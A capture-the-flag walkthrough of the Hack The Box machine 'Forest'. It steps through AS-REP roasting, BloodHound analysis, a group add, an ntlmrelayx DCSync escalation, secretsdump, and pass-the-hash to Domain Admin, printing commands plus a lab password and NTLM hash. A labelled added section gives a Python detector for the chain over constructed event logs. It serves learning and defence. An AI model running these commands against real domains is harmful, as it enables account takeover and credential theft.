Hack The Box - Forest


We are going to pwn Forest by egre55 & mrb3n from Hack The Box.

Link : https://www.hackthebox.eu/home/machines/profile/212

Let’s Begin with our Initial Nmap Scan.

Nmap Scan Results:

53/tcp    open   domain?
| fingerprint-strings: 
|   DNSVersionBindReqTCP: 
|     version
|_    bind
63/tcp    closed via-ftp
88/tcp    open   kerberos-sec Microsoft Windows Kerberos (server time: 2020-03-20 08:27:25Z)
135/tcp   open   msrpc        Microsoft Windows RPC
139/tcp   open   netbios-ssn  Microsoft Windows netbios-ssn
389/tcp   open   ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp   open   microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464/tcp   open   kpasswd5?
593/tcp   open   ncacn_http   Microsoft Windows RPC over HTTP 1.0
3268/tcp  open   ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
5985/tcp  open   http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open   mc-nmf       .NET Message Framing
47001/tcp open   http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open   msrpc        Microsoft Windows RPC
49665/tcp open   msrpc        Microsoft Windows RPC
49666/tcp open   msrpc        Microsoft Windows RPC
49667/tcp open   msrpc        Microsoft Windows RPC
49670/tcp open   msrpc        Microsoft Windows RPC
49676/tcp open   ncacn_http   Microsoft Windows RPC over HTTP 1.0
49677/tcp open   msrpc        Microsoft Windows RPC
49684/tcp open   msrpc        Microsoft Windows RPC
49706/tcp open   msrpc        Microsoft Windows RPC
49910/tcp open   msrpc        Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:

Network Distance: 2 hops
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 2h29m50s, deviation: 4h02m30s, median: 9m49s
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: FOREST
|   NetBIOS computer name: FOREST\x00
|   Domain name: htb.local
|   Forest name: htb.local
|   FQDN: FOREST.htb.local
|_  System time: 2020-03-20T01:28:47-07:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2020-03-20T08:28:48
|_  start_date: 2020-03-20T05:45:49


I could log in to SMB anonymously, but no shares were listed.

root@w0lf:~/CTF/HTB/Boxes/Forest# smbclient -L
Enter WORKGROUP\root's password: 
Anonymous login successful

	Sharename       Type      Comment
	---------       ----      -------
SMB1 disabled -- no workgroup available


RPC also accepts a null session, so I connected without any password.

I can get a list of domain users with enumdomusers:

root@w0lf:~/CTF/HTB/Boxes/Forest# rpcclient -U ""
Enter WORKGROUP\'s password: 

rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[$331000-VK4ADACQNUCA] rid:[0x463]
user:[SM_2c8eef0a09b545acb] rid:[0x464]
user:[SM_ca8c2ed5bdab4dc9b] rid:[0x465]
user:[SM_75a538d3025e4db9a] rid:[0x466]
user:[SM_681f53d4942840e18] rid:[0x467]
user:[SM_1b41c9286325456bb] rid:[0x468]
user:[SM_9b69f1b9d2cc45549] rid:[0x469]
user:[SM_7c96b981967141ebb] rid:[0x46a]
user:[SM_c75ee099d0a64c91b] rid:[0x46b]
user:[SM_1ffab36a2f5f479cb] rid:[0x46c]
user:[HealthMailboxc3d7722] rid:[0x46e]
user:[HealthMailboxfc9daad] rid:[0x46f]
user:[HealthMailboxc0a90c9] rid:[0x470]
user:[HealthMailbox670628e] rid:[0x471]
user:[HealthMailbox968e74d] rid:[0x472]
user:[HealthMailbox6ded678] rid:[0x473]
user:[HealthMailbox83d6781] rid:[0x474]
user:[HealthMailboxfd87238] rid:[0x475]
user:[HealthMailboxb01ac64] rid:[0x476]
user:[HealthMailbox7108a4e] rid:[0x477]
user:[HealthMailbox0659cc1] rid:[0x478]
user:[sebastien] rid:[0x479]
user:[lucinda] rid:[0x47a]
user:[svc-alfresco] rid:[0x47b]
user:[andy] rid:[0x47e]
user:[mark] rid:[0x47f]
user:[santi] rid:[0x480]
rpcclient $> 

Getting a User Shell:

Since port 88 (Kerberos) is open, we can move on to Kerberoasting. But Kerberoasting needs valid domain credentials to authenticate. We still have a chance if some account has "Do not require Kerberos preauthentication" set to True (AS-REP roasting), because the KDC will then hand out an encrypted AS-REP for that account without a password. There is a tool called GetNPUsers.py in Impacket that does exactly this.

This is the tool we are looking for, so let's give it a try.

I created a list of the users we got from RPC enumeration.

root@w0lf:~/CTF/HTB/Boxes/Forest# cat userlist.txt 

The nmap scan revealed the domain name htb.local, so I added it to my /etc/hosts.

GetNPUsers.py -usersfile userlist.txt -dc-ip -request htb.local/

We got an AS-REP hash for the user svc-alfresco. Let's crack it with john.

We got the password for the user svc-alfresco: s3rvice

I used Evil-WinRM to log in.

Privilege Escalation:

We have a shell, so I am going to run SharpHound to collect all the data and copy it back to my machine so I can import it into BloodHound.

Evil-WinRM has an easy way to upload files. First copy the file you want to upload into the Evil-WinRM directory, in our case SharpHound.exe, then run upload SharpHound.exe inside the session to push it to the machine.


Once it was uploaded I executed it:

./Sharphound.exe -c all

-c sets the CollectionMethods; all collects everything.

The output is stored in a zip file.

Like the upload command, Evil-WinRM also has a download command. The file is saved in the Evil-WinRM directory.

Drag the .zip file into BloodHound. Once it is imported successfully you get a message.

Now run Queries -> Find Shortest Paths to Domain Admins.


You can see that our user svc-alfresco is in Service Account, which is a member of Privileged IT Account, which is a member of Account Operators, so effectively svc-alfresco is a member of Account Operators. And Account Operators has the GenericAll privilege on the Exchange Windows Permissions group.

GenericAll - full rights to the object (add users to a group or reset a user's password)


We need to add a user to the group. To learn more, click the GenericAll edge, choose ? HELP and click Abuse Info. If you scroll down, you can see examples of how to do it.

First we need to add a user to Exchange Windows Permissions. We can type net group "Exchange Windows Permissions" to check who is in the group.

It seems like no one. So we add svc-alfresco to this group.

Added successfully. The Exchange Windows Permissions group has WriteDACL on the Domain object in Active Directory, which lets any member of this group modify the domain's privileges, including granting the rights needed to perform a DCSync operation.

Reference : https://dirkjanm.io/abusing-exchange-one-api-call-away-from-domain-admin/

Next, run ntlmrelayx:

python3 ntlmrelayx.py -t ldap:// --escalate-user svc-alfresco


Now we browse to our localhost and enter the svc-alfresco password, and we see the connection coming in at ntlmrelayx, which gives our user DCSync privileges.

We got the connection back, and if you look closely it tells us to run secretsdump.py.

Here we dump the Administrator hash:

secretsdump.py htb.local/svc-alfresco:s3rvice@
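The whole chain above leaves a footprint in the domain controller's Security log: an AS-REP issued without pre-authentication (GetNPUsers), a member added to Exchange Windows Permissions, and a replication request (DCSync) from a normal user account. As an added example that is not part of the original writeup, here is the detection logic run over a few constructed event records; the JSON field names follow the Security log's EventData names, the IPs and DNs are constructed, and the check functions are my own.

```python
"""Detection logic for the Forest chain: AS-REP roasting (4768, no pre-auth, RC4),
group add to Exchange Windows Permissions (4728) and DCSync (4662 with replication
GUIDs). Added example, not the writeup's own code; the events are constructed."""
import json

# Extended rights that grant directory replication (what a DCSync requests).
REPL_GUIDS = {"1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",   # DS-Replication-Get-Changes
              "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"}   # DS-Replication-Get-Changes-All
WATCHED_GROUPS = {"Exchange Windows Permissions", "Account Operators"}

# Constructed sample events, one JSON object per line (IPs from the documentation range).
SAMPLE_LOG = """
{"EventID":4768,"TargetUserName":"svc-alfresco","PreAuthType":"0","TicketEncryptionType":"0x17","IpAddress":"192.0.2.10"}
{"EventID":4768,"TargetUserName":"andy","PreAuthType":"2","TicketEncryptionType":"0x12","IpAddress":"192.0.2.20"}
{"EventID":4728,"SubjectUserName":"svc-alfresco","TargetUserName":"Exchange Windows Permissions","MemberName":"CN=svc-alfresco,OU=Service Accounts,DC=htb,DC=local"}
{"EventID":4662,"SubjectUserName":"svc-alfresco","ObjectType":"domainDNS","Properties":"{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"}
{"EventID":4662,"SubjectUserName":"FOREST$","ObjectType":"domainDNS","Properties":"{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"}
"""

def check_event(ev):
    """Return an alert string for one parsed event, or None if it looks benign."""
    eid = ev.get("EventID")
    if eid == 4768 and ev.get("PreAuthType") == "0" and ev.get("TicketEncryptionType") == "0x17":
        # TGT issued with no pre-authentication and RC4 encryption: AS-REP roasting shape.
        return f"asrep-roast {ev['TargetUserName']} from {ev['IpAddress']}"
    if eid == 4728 and ev.get("TargetUserName") in WATCHED_GROUPS:
        # Membership change on a group that can reach Domain Admin.
        return f"group-add {ev['MemberName']} -> {ev['TargetUserName']} by {ev['SubjectUserName']}"
    if eid == 4662 and ev.get("ObjectType") == "domainDNS":
        guids = {g.strip("{}").lower() for g in ev.get("Properties", "").split()}
        # Replication rights exercised by something that is not a DC machine account
        # (assumption: legitimate replication comes from accounts ending in "$").
        if guids & REPL_GUIDS and not ev["SubjectUserName"].endswith("$"):
            return f"dcsync {ev['SubjectUserName']}"
    return None

def scan(log_text):
    """Parse JSON-lines log text and return the alerts in log order."""
    alerts = []
    for line in log_text.splitlines():
        if line.strip():
            alert = check_event(json.loads(line))
            if alert:
                alerts.append(alert)
    return alerts

if __name__ == "__main__":
    for alert in scan(SAMPLE_LOG):
        print(alert)
```

The machine-account exclusion on 4662 is a deliberate simplification; in production you would whitelist the actual DC accounts and the Azure AD Connect service account instead.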


Now I can use this hash to log in as Administrator with Evil-WinRM (pass-the-hash):

ruby evil-winrm.rb -i -u administrator -H "32693b11e6aa90eb43d32c72a07ceea6"

We own root.